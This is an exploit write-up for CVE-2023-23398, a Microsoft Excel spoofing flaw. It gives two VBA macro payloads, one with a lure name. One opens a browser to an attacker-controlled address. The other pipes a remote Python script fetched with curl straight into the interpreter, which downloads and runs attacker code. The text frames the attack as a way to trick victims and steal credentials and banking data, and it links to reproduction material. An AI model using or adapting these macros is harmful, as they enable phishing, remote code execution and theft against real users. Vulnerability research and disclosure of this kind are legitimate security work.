## Title: Microsoft Excel Spoofing Vulnerability
## Author: nu11secur1ty
## Date: 04.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/
## CVE-2023-23398

## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using an Excel malicious file and he can
steal credentials, bank accounts information, sniffing and tracking
all the traffic of the victim without stopping - it depends on the
scenario and etc.

STATUS: HIGH Vulnerability

[+]Exploit:

```vbs
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:http://192.168.100.96/"
End Sub
```
[+]The victim Exploit + Curl Piping:

## WARNING:
The exploit server must be STREAMING at the moment when the victim hit
the button of the exploit!

```vbs
Sub silno_chukane()
  Call Shell("cmd.exe /S /c" & "curl -s
http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)

## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)

[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)

## Proof and Exploit
[href](https://streamable.com/n5qp4q)

## Proof and Exploit
[href](https://streamable.com/u2wxzz)

## Time spend:
01:37:00